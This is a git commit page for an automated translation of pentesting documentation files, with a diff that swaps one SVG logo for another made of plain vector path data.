Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw

This commit is contained in:
Translator 2024-08-04 15:19:32 +00:00
parent f80c776765
commit fd351e1e96
17 changed files with 219 additions and 206 deletions

View file

@ -1,29 +1,42 @@
<svg width="796" height="313" viewBox="0 0 796 313" fill="none" xmlns="http://www.w3.org/2000/svg"> <?xml version="1.0" encoding="UTF-8"?>
<rect width="796" height="313" rx="20" fill="#262626"/> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="550px" height="216px" viewBox="0 0 549 216" version="1.1">
<g clip-path="url(#clip0_2558_1885)">
<path d="M559.476 215.161C556.326 215.161 553.887 214.188 552.162 212.232C550.436 210.285 549.583 207.475 549.583 203.803C549.583 200.191 550.446 197.381 552.162 195.375C553.887 193.368 556.295 192.365 559.386 192.365C563.971 192.365 566.761 194.371 567.734 198.385L584.34 196.84C583.658 193.227 582.203 190.127 579.995 187.548C577.788 184.97 574.938 183.033 571.436 181.739C567.935 180.444 563.861 179.802 559.215 179.802C558.714 179.802 558.232 179.832 557.74 179.852C549.583 188.813 541.144 197.502 532.425 205.92C532.666 210.074 533.739 213.716 535.636 216.847C537.813 220.429 540.894 223.138 544.887 224.974C548.87 226.811 553.596 227.724 559.045 227.724C566.62 227.724 572.641 226.108 577.116 222.857C581.591 219.616 584.26 214.961 585.113 208.88H568.336C567.644 213.064 564.694 215.161 559.476 215.161Z" fill="#FA8072"/>
<path d="M526.375 211.65C521.879 215.854 517.324 219.988 512.688 224.051C514.384 226.279 517.053 227.724 520.063 227.724C525.191 227.724 529.345 223.57 529.345 218.442C529.345 215.753 528.201 213.345 526.375 211.65Z" fill="#FA8072"/>
<path d="M728.937 184.317C725.977 181.307 721.843 179.802 716.505 179.802C709.11 179.802 703.14 182.501 698.605 187.889C697.28 185.251 695.364 183.244 692.835 181.869C690.307 180.495 687.277 179.802 683.715 179.802C677.233 179.802 671.754 182.351 667.279 187.458V181.177H650.583V226.349H667.62V201.746C667.62 199.448 668.483 197.442 670.199 195.726C671.112 194.753 672.166 194 673.34 193.488C674.514 192.977 675.738 192.716 677.002 192.716C679.3 192.716 680.945 193.288 681.949 194.442C682.952 195.585 683.454 197.422 683.454 199.95V226.369H700.491V201.244C700.491 199.178 701.354 197.291 703.07 195.565C705.077 193.669 707.344 192.726 709.873 192.726C712.171 192.726 713.816 193.318 714.819 194.492C715.823 195.666 716.325 197.492 716.325 199.96V226.379H733.362V196.95C733.362 191.562 731.887 187.358 728.937 184.348V184.317Z" fill="#FA8072"/>
<path d="M637.088 186.033C632.271 181.879 625.469 179.792 616.699 179.792C607.919 179.792 601.006 181.939 595.959 186.244C590.912 190.548 588.384 196.458 588.384 203.964C588.384 211.479 590.792 217.319 595.608 221.473C600.424 225.637 607.227 227.714 615.997 227.714C624.776 227.714 631.679 225.566 636.736 221.262C641.783 216.957 644.312 211.078 644.312 203.623C644.312 196.047 641.904 190.187 637.088 186.023V186.033ZM624.315 212.232C622.448 214.178 619.799 215.161 616.358 215.161C612.856 215.161 610.187 214.188 608.361 212.232C606.525 210.285 605.612 207.475 605.612 203.803C605.612 200.131 606.545 197.231 608.411 195.284C610.277 193.338 612.926 192.365 616.368 192.365C619.809 192.365 622.529 193.338 624.365 195.284C626.201 197.231 627.114 200.05 627.114 203.713C627.114 207.445 626.181 210.285 624.315 212.232Z" fill="#FA8072"/>
<path d="M489.069 194.973C488.557 193.368 487.554 192.194 486.059 191.452C484.564 190.709 482.507 190.338 479.868 190.338C477.289 190.338 475.282 190.639 473.848 191.241C472.413 191.843 471.7 192.716 471.7 193.86C471.7 194.893 472.262 195.696 473.376 196.268C474.5 196.84 476.396 197.301 479.095 197.642L485.286 198.505C490.674 199.248 494.818 200.201 497.718 201.345C500.608 202.489 502.665 203.964 503.869 205.77C505.073 207.576 505.675 209.944 505.675 212.864C505.675 217.74 503.578 221.433 499.394 223.961C495.21 226.48 489.079 227.744 480.992 227.744C472.904 227.744 466.172 226.429 461.817 223.79C457.462 221.152 454.994 217.198 454.422 211.92H470.336C471.369 215.242 474.831 216.907 480.741 216.907C483.49 216.907 485.587 216.606 487.022 216.004C488.457 215.402 489.169 214.499 489.169 213.295C489.169 212.262 488.627 211.489 487.534 210.977C486.44 210.466 484.524 210.034 481.774 209.683L476.095 208.91C471.048 208.218 467.055 207.265 464.095 206.031C461.145 204.796 459.008 203.221 457.683 201.305C456.359 199.388 455.706 196.99 455.706 194.121C455.706 189.595 457.824 186.083 462.068 183.585C466.312 181.087 472.242 179.842 479.868 179.842C487.263 179.842 492.972 180.936 496.986 183.113C500.999 185.291 503.578 188.762 504.722 193.518L489.069 194.983V194.973Z" fill="white"/>
<path d="M278.379 226.359V179.752H255.502V164.962H319.307V179.752H296.43V226.359H278.369H278.379Z" fill="white"/>
<path d="M365.673 203.663C365.673 211.118 363.145 216.988 358.108 221.292C353.061 225.597 346.157 227.744 337.378 227.744C328.608 227.744 321.815 225.667 316.999 221.513C312.183 217.359 309.775 211.519 309.775 204.014C309.775 196.509 312.293 190.599 317.34 186.294C322.387 181.99 329.291 179.842 338.07 179.842C346.84 179.842 353.633 181.919 358.449 186.073C363.265 190.227 365.673 196.097 365.673 203.663ZM348.475 203.753C348.475 200.081 347.552 197.271 345.726 195.325C343.89 193.378 341.221 192.405 337.729 192.405C334.237 192.405 331.638 193.378 329.772 195.325C327.906 197.271 326.973 200.111 326.973 203.843C326.973 207.516 327.886 210.325 329.722 212.272C331.558 214.218 334.217 215.191 337.719 215.191C341.161 215.191 343.809 214.218 345.676 212.272C347.542 210.325 348.475 207.486 348.475 203.753Z" fill="white"/>
<path d="M425.695 203.663C425.695 211.118 423.167 216.988 418.13 221.292C413.083 225.597 406.18 227.744 397.4 227.744C388.631 227.744 381.838 225.667 377.021 221.513C372.205 217.359 369.797 211.519 369.797 204.014C369.797 196.509 372.316 190.599 377.363 186.294C382.41 181.99 389.313 179.842 398.092 179.842C406.862 179.842 413.655 181.919 418.471 186.073C423.287 190.227 425.695 196.097 425.695 203.663ZM408.497 203.753C408.497 200.081 407.574 197.271 405.748 195.325C403.912 193.378 401.243 192.405 397.751 192.405C394.31 192.405 391.661 193.378 389.794 195.325C387.928 197.271 386.995 200.111 386.995 203.843C386.995 207.576 387.908 210.325 389.744 212.272C391.581 214.218 394.239 215.191 397.741 215.191C401.243 215.191 403.832 214.218 405.698 212.272C407.564 210.325 408.497 207.486 408.497 203.753Z" fill="white"/>
<path d="M431.967 226.359V164.962H448.994V226.359H431.967Z" fill="white"/>
<path d="M255.502 147.935V86.5381H285.945C295.115 86.5381 301.979 88.284 306.544 91.7858C311.099 95.2876 313.377 100.585 313.377 107.699C313.377 114.864 311.039 120.201 306.363 123.693C301.688 127.195 294.543 128.941 284.911 128.941H273.041V147.945H255.502V147.935ZM284.57 115.425C288.473 115.425 291.293 114.813 293.038 113.579C294.784 112.345 295.667 110.358 295.667 107.599C295.667 104.96 294.804 103.044 293.089 101.84C291.373 100.636 288.583 100.034 284.75 100.034H273.051V115.425H284.57Z" fill="white"/>
<path d="M331.528 129.362C331.819 132.172 332.923 134.309 334.839 135.774C336.756 137.239 339.415 137.971 342.796 137.971C348.244 137.971 351.566 136.456 352.77 133.416H368.513C366.165 144.022 357.445 149.33 342.375 149.33C333.826 149.33 327.214 147.293 322.508 143.219C317.802 139.145 315.454 133.386 315.454 125.931C315.454 121.175 316.538 116.941 318.725 113.248C320.902 109.546 324.053 106.656 328.187 104.559C332.311 102.472 337.187 101.418 342.806 101.418C351.114 101.418 357.566 103.465 362.151 107.569C366.737 111.673 369.034 117.472 369.034 124.988V129.372H331.538L331.528 129.362ZM353.201 120.332C352.91 115.175 349.358 112.596 342.535 112.596C339.726 112.596 337.338 113.308 335.351 114.743C333.374 116.178 332.21 118.044 331.869 120.332H353.191H353.201Z" fill="white"/>
<path d="M410.725 147.935V121.877C410.725 119.238 410.113 117.322 408.879 116.118C407.645 114.914 405.708 114.312 403.069 114.312C401.634 114.312 400.23 114.583 398.855 115.124C397.48 115.666 396.276 116.429 395.243 117.402C393.296 119.178 392.323 121.245 392.323 123.593V147.925H375.296V102.783H391.982V109.064C396.738 103.967 402.648 101.408 409.702 101.408C415.381 101.408 419.806 102.913 422.986 105.923C426.167 108.934 427.762 113.158 427.762 118.606V147.935H410.735H410.725Z" fill="white"/>
<path d="M471.359 146.641C467.005 148.075 462.329 148.788 457.342 148.788C450.92 148.788 446.265 147.443 443.365 144.744C440.465 142.055 439.02 137.66 439.02 131.59V115.165H430.421V102.783H439.02V90.9128H456.048V102.783H469.463V115.165H456.048V130.386C456.048 132.393 456.549 133.868 457.553 134.811C458.556 135.754 460.172 136.226 462.409 136.226C464.296 136.226 466.593 135.824 469.292 135.021L471.359 146.631V146.641Z" fill="white"/>
<path d="M488.898 129.362C489.179 132.172 490.283 134.309 492.209 135.774C494.126 137.239 496.785 137.971 500.166 137.971C505.614 137.971 508.936 136.456 510.14 133.416H525.873C523.525 144.022 514.805 149.33 499.735 149.33C491.196 149.33 484.574 147.293 479.868 143.219C475.162 139.145 472.814 133.386 472.814 125.931C472.814 121.175 473.898 116.941 476.085 113.248C478.262 109.546 481.413 106.656 485.547 104.559C489.681 102.472 494.547 101.418 500.166 101.418C508.474 101.418 514.926 103.465 519.511 107.569C524.097 111.673 526.394 117.472 526.394 124.988V129.372H488.898V129.362ZM510.571 120.332C510.28 115.175 506.728 112.596 499.905 112.596C497.096 112.596 494.698 113.308 492.721 114.743C490.744 116.178 489.58 118.044 489.239 120.332H510.561H510.571Z" fill="white"/>
<path d="M564.323 116.549C563.811 114.944 562.807 113.77 561.312 113.027C559.817 112.285 557.76 111.914 555.121 111.914C552.483 111.914 550.536 112.215 549.101 112.817C547.666 113.419 546.954 114.292 546.954 115.435C546.954 116.469 547.516 117.272 548.63 117.844C549.753 118.415 551.65 118.877 554.349 119.218L560.54 120.081C565.928 120.824 570.072 121.777 572.972 122.921C575.861 124.065 577.918 125.539 579.122 127.346C580.326 129.152 580.928 131.52 580.928 134.439C580.928 139.316 578.831 143.008 574.647 145.537C570.463 148.055 564.333 149.32 556.245 149.32C547.817 149.32 541.425 148.005 537.071 145.366C532.716 142.727 530.248 138.774 529.676 133.496H545.589C546.623 136.817 550.085 138.483 555.994 138.483C558.744 138.483 560.841 138.182 562.276 137.58C563.71 136.978 564.423 136.075 564.423 134.871C564.423 133.837 563.881 133.065 562.787 132.553C561.694 132.041 559.777 131.61 557.028 131.259L551.349 130.486C546.302 129.794 542.308 128.841 539.348 127.606C536.398 126.372 534.261 124.797 532.937 122.881C531.612 120.964 530.96 118.566 530.96 115.696C530.96 111.171 533.077 107.659 537.322 105.161C541.566 102.662 547.496 101.418 555.121 101.418C562.747 101.418 568.226 102.512 572.239 104.689C576.253 106.867 578.831 110.338 579.975 115.094L564.323 116.559V116.549Z" fill="white"/>
<path d="M622.88 146.641C618.525 148.075 613.849 148.788 608.863 148.788C602.441 148.788 597.785 147.443 594.886 144.744C591.986 142.055 590.541 137.66 590.541 131.59V115.165H581.942V102.783H590.541V90.9128H607.568V102.783H620.983V115.165H607.568V130.386C607.568 132.393 608.07 133.868 609.073 134.811C610.077 135.754 611.702 136.226 613.93 136.226C615.826 136.226 618.114 135.824 620.813 135.021L622.88 146.631V146.641Z" fill="white"/>
<path d="M137.264 77.4073L209.748 95.739C210.3 94.9664 210.852 94.2039 211.403 93.4313V93.4112C213.641 90.2405 215.848 87.0297 218.026 83.8088C218.357 83.3172 218.678 82.8255 219.009 82.3339C220.775 79.705 222.511 77.0561 224.237 74.3971C224.778 73.5643 225.32 72.7215 225.852 71.8786C227.397 69.4605 228.922 67.0223 230.437 64.574C230.969 63.7111 231.511 62.8482 232.043 61.9853C234.01 58.7645 235.956 55.5135 237.873 52.2525L238.264 51.51H235.675C226.414 60.8916 215.668 71.2967 205.674 79.9157L137.264 62.6174L62 81.6315L63.3646 96.0902L137.264 77.4073Z" fill="#FA8072"/>
<path d="M92.8138 216.255C133.983 185.01 170.546 148.236 201.661 106.776L137.264 90.5015L64.7393 108.833L69.405 158.069C71.4418 179.582 79.7097 199.729 92.8239 216.255H92.8138Z" fill="#2A76D1"/>
<path d="M77.2213 247.561C76.9303 247.781 76.6293 248.012 76.3383 248.233C73.5489 250.37 70.7294 252.477 67.8999 254.564V256.3C71.0907 255.046 74.2714 253.772 77.432 252.457L90.9275 246.597C98.3926 243.216 105.767 239.664 113.032 235.931C115.28 237.617 117.587 239.233 119.975 240.748L137.274 251.765L154.572 240.748C183.269 222.456 201.931 191.953 205.142 158.079L209.808 108.843L206.166 107.92C171.389 161.601 127.912 208.7 77.2213 247.561Z" fill="white"/>
</g>
<defs> <defs>
<clipPath id="clip0_2558_1885"> <clipPath id="clip1">
<rect width="671.362" height="204.8" fill="white" transform="translate(62 51.5)"/> <path d="M 448 124 L 505.796875 124 L 505.796875 157 L 448 157 Z M 448 124 "/>
</clipPath>
<clipPath id="clip2">
<path d="M 42.761719 35.539062 L 165 35.539062 L 165 67 L 42.761719 67 Z M 42.761719 35.539062 "/>
</clipPath>
<clipPath id="clip3">
<path d="M 46 74 L 145 74 L 145 176.871094 L 46 176.871094 Z M 46 74 "/>
</clipPath> </clipPath>
</defs> </defs>
<g id="surface1">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(14.901961%,14.901961%,14.901961%);fill-opacity:1;" d="M 13.792969 0 L 535.207031 0 C 542.824219 0 549 6.179688 549 13.800781 L 549 202.199219 C 549 209.820312 542.824219 216 535.207031 216 L 13.792969 216 C 6.175781 216 0 209.820312 0 202.199219 L 0 13.800781 C 0 6.179688 6.175781 0 13.792969 0 Z M 13.792969 0 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 385.871094 148.480469 C 383.695312 148.480469 382.015625 147.808594 380.824219 146.460938 C 379.636719 145.117188 379.046875 143.175781 379.046875 140.644531 C 379.046875 138.152344 379.640625 136.210938 380.824219 134.828125 C 382.015625 133.441406 383.675781 132.75 385.808594 132.75 C 388.96875 132.75 390.894531 134.132812 391.566406 136.90625 L 403.019531 135.839844 C 402.546875 133.34375 401.542969 131.207031 400.023438 129.425781 C 398.5 127.648438 396.535156 126.308594 394.117188 125.417969 C 391.703125 124.523438 388.894531 124.082031 385.691406 124.082031 C 385.34375 124.082031 385.011719 124.101562 384.671875 124.113281 C 379.046875 130.300781 373.226562 136.296875 367.210938 142.105469 C 367.378906 144.972656 368.117188 147.484375 369.425781 149.644531 C 370.929688 152.117188 373.054688 153.988281 375.808594 155.253906 C 378.554688 156.519531 381.8125 157.152344 385.574219 157.152344 C 390.796875 157.152344 394.949219 156.035156 398.035156 153.792969 C 401.121094 151.554688 402.964844 148.34375 403.550781 144.148438 L 391.980469 144.148438 C 391.503906 147.035156 389.46875 148.480469 385.871094 148.480469 Z M 385.871094 148.480469 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 363.039062 146.058594 C 359.9375 148.960938 356.796875 151.8125 353.601562 154.617188 C 354.769531 156.152344 356.609375 157.152344 358.6875 157.152344 C 362.222656 157.152344 365.089844 154.285156 365.089844 150.746094 C 365.089844 148.890625 364.300781 147.226562 363.039062 146.058594 Z M 363.039062 146.058594 "/>
<g clip-path="url(#clip1)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 502.746094 127.195312 C 500.707031 125.121094 497.855469 124.082031 494.171875 124.082031 C 489.070312 124.082031 484.953125 125.941406 481.828125 129.660156 C 480.914062 127.839844 479.589844 126.457031 477.847656 125.507812 C 476.105469 124.558594 474.015625 124.082031 471.558594 124.082031 C 467.085938 124.082031 463.308594 125.839844 460.222656 129.363281 L 460.222656 125.03125 L 448.707031 125.03125 L 448.707031 156.203125 L 460.457031 156.203125 L 460.457031 139.222656 C 460.457031 137.636719 461.050781 136.253906 462.234375 135.070312 C 462.863281 134.398438 463.59375 133.878906 464.402344 133.523438 C 465.210938 133.171875 466.054688 132.992188 466.925781 132.992188 C 468.511719 132.992188 469.648438 133.386719 470.339844 134.183594 C 471.03125 134.972656 471.378906 136.238281 471.378906 137.984375 L 471.378906 156.214844 L 483.128906 156.214844 L 483.128906 138.878906 C 483.128906 137.453125 483.722656 136.148438 484.90625 134.957031 C 486.289062 133.648438 487.855469 133 489.597656 133 C 491.183594 133 492.316406 133.40625 493.007812 134.21875 C 493.703125 135.027344 494.046875 136.289062 494.046875 137.992188 L 494.046875 156.222656 L 505.796875 156.222656 L 505.796875 135.914062 C 505.796875 132.195312 504.78125 129.296875 502.746094 127.21875 Z M 502.746094 127.195312 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 439.398438 128.378906 C 436.078125 125.515625 431.386719 124.074219 425.335938 124.074219 C 419.28125 124.074219 414.511719 125.554688 411.03125 128.527344 C 407.550781 131.496094 405.808594 135.574219 405.808594 140.753906 C 405.808594 145.941406 407.46875 149.972656 410.789062 152.835938 C 414.113281 155.710938 418.804688 157.144531 424.851562 157.144531 C 430.90625 157.144531 435.667969 155.664062 439.15625 152.691406 C 442.636719 149.722656 444.382812 145.664062 444.382812 140.519531 C 444.382812 135.292969 442.71875 131.246094 439.398438 128.375 Z M 430.589844 146.460938 C 429.300781 147.804688 427.472656 148.480469 425.101562 148.480469 C 422.6875 148.480469 420.84375 147.808594 419.585938 146.460938 C 418.320312 145.117188 417.691406 143.175781 417.691406 140.644531 C 417.691406 138.109375 418.332031 136.109375 419.621094 134.765625 C 420.90625 133.421875 422.734375 132.75 425.109375 132.75 C 427.480469 132.75 429.355469 133.421875 430.625 134.765625 C 431.890625 136.109375 432.519531 138.054688 432.519531 140.582031 C 432.519531 143.15625 431.875 145.117188 430.589844 146.460938 Z M 430.589844 146.460938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.308594 134.550781 C 336.957031 133.441406 336.265625 132.632812 335.234375 132.121094 C 334.203125 131.609375 332.785156 131.351562 330.964844 131.351562 C 329.183594 131.351562 327.800781 131.558594 326.8125 131.976562 C 325.824219 132.390625 325.332031 132.992188 325.332031 133.78125 C 325.332031 134.496094 325.71875 135.050781 326.488281 135.445312 C 327.261719 135.839844 328.570312 136.15625 330.429688 136.390625 L 334.699219 136.988281 C 338.417969 137.5 341.273438 138.15625 343.273438 138.949219 C 345.269531 139.738281 346.6875 140.753906 347.519531 142 C 348.347656 143.246094 348.761719 144.882812 348.761719 146.898438 C 348.761719 150.261719 347.316406 152.808594 344.429688 154.554688 C 341.546875 156.292969 337.316406 157.164062 331.738281 157.164062 C 326.160156 157.164062 321.519531 156.257812 318.515625 154.4375 C 315.511719 152.617188 313.808594 149.886719 313.414062 146.246094 L 324.390625 146.246094 C 325.101562 148.539062 327.488281 149.6875 331.566406 149.6875 C 333.460938 149.6875 334.910156 149.480469 335.898438 149.0625 C 336.886719 148.648438 337.378906 148.023438 337.378906 147.195312 C 337.378906 146.480469 337.003906 145.949219 336.25 145.59375 C 335.496094 145.242188 334.175781 144.945312 332.277344 144.703125 L 328.363281 144.167969 C 324.882812 143.691406 322.128906 143.03125 320.085938 142.179688 C 318.050781 141.328125 316.578125 140.242188 315.664062 138.917969 C 314.75 137.597656 314.300781 135.941406 314.300781 133.960938 C 314.300781 130.839844 315.761719 128.414062 318.6875 126.691406 C 321.613281 124.96875 325.703125 124.109375 330.964844 124.109375 C 336.066406 124.109375 340.003906 124.863281 342.769531 126.367188 C 345.539062 127.867188 347.316406 130.265625 348.105469 133.546875 L 337.308594 134.558594 Z M 337.308594 134.550781 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 191.996094 156.210938 L 191.996094 124.046875 L 176.21875 124.046875 L 176.21875 113.839844 L 220.226562 113.839844 L 220.226562 124.046875 L 204.449219 124.046875 L 204.449219 156.210938 L 191.992188 156.210938 Z M 191.996094 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 252.203125 140.546875 C 252.203125 145.691406 250.460938 149.742188 246.988281 152.710938 C 243.503906 155.683594 238.742188 157.164062 232.6875 157.164062 C 226.640625 157.164062 221.957031 155.730469 218.632812 152.863281 C 215.3125 150 213.652344 145.96875 213.652344 140.789062 C 213.652344 135.609375 215.386719 131.53125 218.867188 128.5625 C 222.351562 125.589844 227.113281 124.109375 233.167969 124.109375 C 239.214844 124.109375 243.898438 125.542969 247.222656 128.410156 C 250.542969 131.273438 252.203125 135.324219 252.203125 140.546875 Z M 240.34375 140.609375 C 240.34375 138.074219 239.707031 136.136719 238.445312 134.792969 C 237.179688 133.449219 235.339844 132.777344 232.929688 132.777344 C 230.523438 132.777344 228.730469 133.449219 227.441406 134.792969 C 226.15625 136.136719 225.511719 138.097656 225.511719 140.671875 C 225.511719 143.207031 226.140625 145.144531 227.410156 146.488281 C 228.675781 147.832031 230.507812 148.503906 232.925781 148.503906 C 235.296875 148.503906 237.125 147.832031 238.414062 146.488281 C 239.699219 145.144531 240.34375 143.183594 240.34375 140.609375 Z M 240.34375 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 293.601562 140.546875 C 293.601562 145.691406 291.859375 149.742188 288.382812 152.710938 C 284.902344 155.683594 280.140625 157.164062 274.085938 157.164062 C 268.039062 157.164062 263.351562 155.730469 260.03125 152.863281 C 256.710938 150 255.046875 145.96875 255.046875 140.789062 C 255.046875 135.609375 256.785156 131.53125 260.265625 128.5625 C 263.746094 125.589844 268.507812 124.109375 274.5625 124.109375 C 280.613281 124.109375 285.296875 125.542969 288.617188 128.410156 C 291.941406 131.273438 293.601562 135.324219 293.601562 140.546875 Z M 281.738281 140.609375 C 281.738281 138.074219 281.101562 136.136719 279.84375 134.792969 C 278.578125 133.449219 276.738281 132.777344 274.328125 132.777344 C 271.953125 132.777344 270.128906 133.449219 268.839844 134.792969 C 267.554688 136.136719 266.910156 138.097656 266.910156 140.671875 C 266.910156 143.246094 267.539062 145.144531 268.804688 146.488281 C 270.074219 147.832031 271.90625 148.503906 274.320312 148.503906 C 276.738281 148.503906 278.523438 147.832031 279.808594 146.488281 C 281.097656 145.144531 281.738281 143.183594 281.738281 140.609375 Z M 281.738281 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 297.925781 156.210938 L 297.925781 113.839844 L 309.671875 113.839844 L 309.671875 156.210938 Z M 297.925781 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 176.21875 102.089844 L 176.21875 59.71875 L 197.214844 59.71875 C 203.539062 59.71875 208.273438 60.925781 211.421875 63.339844 C 214.566406 65.757812 216.136719 69.414062 216.136719 74.324219 C 216.136719 79.265625 214.523438 82.949219 211.296875 85.359375 C 208.074219 87.777344 203.144531 88.980469 196.503906 88.980469 L 188.316406 88.980469 L 188.316406 102.097656 L 176.21875 102.097656 Z M 196.265625 79.65625 C 198.960938 79.65625 200.90625 79.230469 202.109375 78.378906 C 203.3125 77.527344 203.921875 76.15625 203.921875 74.253906 C 203.921875 72.433594 203.324219 71.109375 202.144531 70.28125 C 200.960938 69.449219 199.035156 69.03125 196.390625 69.03125 L 188.324219 69.03125 L 188.324219 79.65625 Z M 196.265625 79.65625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 228.65625 89.273438 C 228.855469 91.210938 229.617188 92.6875 230.9375 93.695312 C 232.261719 94.707031 234.09375 95.214844 236.425781 95.214844 C 240.183594 95.214844 242.472656 94.167969 243.304688 92.070312 L 254.164062 92.070312 C 252.542969 99.390625 246.527344 103.050781 236.136719 103.050781 C 230.238281 103.050781 225.679688 101.644531 222.433594 98.835938 C 219.1875 96.023438 217.566406 92.050781 217.566406 86.90625 C 217.566406 83.621094 218.316406 80.699219 219.824219 78.152344 C 221.324219 75.597656 223.5 73.601562 226.351562 72.15625 C 229.195312 70.714844 232.558594 69.988281 236.433594 69.988281 C 242.164062 69.988281 246.613281 71.402344 249.773438 74.234375 C 252.9375 77.066406 254.523438 81.066406 254.523438 86.253906 L 254.523438 89.277344 L 228.660156 89.277344 Z M 243.601562 83.039062 C 243.402344 79.480469 240.953125 77.703125 236.246094 77.703125 C 234.308594 77.703125 232.660156 78.195312 231.292969 79.183594 C 229.925781 80.175781 229.125 81.460938 228.890625 83.039062 Z M 243.601562 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 283.277344 102.089844 L 283.277344 84.105469 C 283.277344 82.285156 282.855469 80.964844 282.003906 80.132812 C 281.152344 79.300781 279.816406 78.886719 277.996094 78.886719 C 277.007812 78.886719 276.039062 79.074219 275.089844 79.445312 C 274.140625 79.820312 273.3125 80.347656 272.597656 81.019531 C 271.253906 82.246094 270.585938 83.671875 270.585938 85.292969 L 270.585938 102.082031 L 258.839844 102.082031 L 258.839844 70.929688 L 270.347656 70.929688 L 270.347656 75.265625 C 273.628906 71.746094 277.707031 69.980469 282.570312 69.980469 C 286.488281 69.980469 289.539062 71.019531 291.734375 73.097656 C 293.925781 75.175781 295.027344 78.089844 295.027344 81.847656 L 295.027344 102.089844 Z M 283.277344 102.089844 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 325.09375 101.195312 C 322.09375 102.1875 318.867188 102.679688 315.429688 102.679688 C 311 102.679688 307.789062 101.75 305.789062 99.886719 C 303.789062 98.03125 302.792969 95 302.792969 90.808594 L 302.792969 79.476562 L 296.859375 79.476562 L 296.859375 70.929688 L 302.792969 70.929688 L 302.792969 62.738281 L 314.535156 62.738281 L 314.535156 70.929688 L 323.789062 70.929688 L 323.789062 79.476562 L 314.535156 79.476562 L 314.535156 89.980469 C 314.535156 91.363281 314.882812 92.382812 315.574219 93.03125 C 316.265625 93.683594 317.378906 94.007812 318.921875 94.007812 C 320.222656 94.007812 321.808594 93.730469 323.671875 93.175781 L 325.09375 101.1875 Z M 325.09375 101.195312 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.191406 89.273438 C 337.386719 91.210938 338.148438 92.6875 339.476562 93.695312 C 340.796875 94.707031 342.632812 95.214844 344.964844 95.214844 C 348.722656 95.214844 351.011719 94.167969 351.84375 92.070312 L 362.695312 92.070312 C 361.074219 99.390625 355.058594 103.050781 344.667969 103.050781 C 338.777344 103.050781 334.210938 101.644531 330.964844 98.835938 C 327.71875 96.023438 326.097656 92.050781 326.097656 86.90625 C 326.097656 83.621094 326.847656 80.699219 328.355469 78.152344 C 329.855469 75.597656 332.03125 73.601562 334.882812 72.15625 C 337.730469 70.714844 341.089844 69.988281 344.964844 69.988281 C 350.695312 69.988281 355.144531 71.402344 358.304688 74.234375 C 361.46875 77.066406 363.054688 81.066406 363.054688 86.253906 L 363.054688 89.277344 L 337.191406 89.277344 Z M 352.140625 83.039062 C 351.9375 79.480469 349.488281 77.703125 344.785156 77.703125 C 342.847656 77.703125 341.191406 78.195312 339.828125 79.183594 C 338.464844 80.175781 337.664062 81.460938 337.425781 83.039062 Z M 352.140625 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 389.210938 80.429688 C 388.859375 79.324219 388.167969 78.511719 387.136719 78 C 386.105469 77.488281 384.6875 77.230469 382.867188 77.230469 C 381.046875 77.230469 379.703125 77.4375 378.714844 77.855469 C 377.722656 78.269531 377.234375 78.871094 377.234375 79.660156 C 377.234375 80.375 377.621094 80.929688 378.390625 81.324219 C 379.164062 81.71875 380.472656 82.035156 382.332031 82.273438 L 386.605469 82.867188 C 390.320312 83.378906 393.179688 84.039062 395.179688 84.828125 C 397.171875 85.617188 398.589844 86.632812 399.417969 87.882812 C 400.25 89.128906 400.664062 90.761719 400.664062 92.777344 C 400.664062 96.140625 399.21875 98.6875 396.332031 100.433594 C 393.449219 102.171875 389.21875 103.046875 383.640625 103.046875 C 377.828125 103.046875 373.421875 102.136719 370.417969 100.316406 C 367.414062 98.496094 365.710938 95.765625 365.316406 92.125 L 376.292969 92.125 C 377.003906 94.417969 379.394531 95.566406 383.46875 95.566406 C 385.363281 95.566406 386.8125 95.359375 387.800781 94.945312 C 388.789062 94.527344 389.28125 93.90625 389.28125 93.074219 C 389.28125 92.359375 388.90625 91.828125 388.152344 91.472656 C 387.398438 91.121094 386.078125 90.824219 384.179688 90.582031 L 380.265625 90.046875 C 376.785156 89.570312 374.027344 88.914062 371.988281 88.058594 C 369.953125 87.207031 368.480469 86.121094 367.566406 84.800781 C 366.652344 83.476562 366.203125 81.820312 366.203125 79.839844 C 366.203125 76.71875 367.664062 74.296875 370.589844 72.570312 C 373.515625 70.847656 377.605469 69.988281 382.867188 69.988281 C 388.125 69.988281 391.90625 70.742188 394.671875 72.246094 C 397.441406 73.75 399.21875 76.144531 400.007812 79.425781 L 389.210938 80.4375 Z M 389.210938 80.429688 "/>
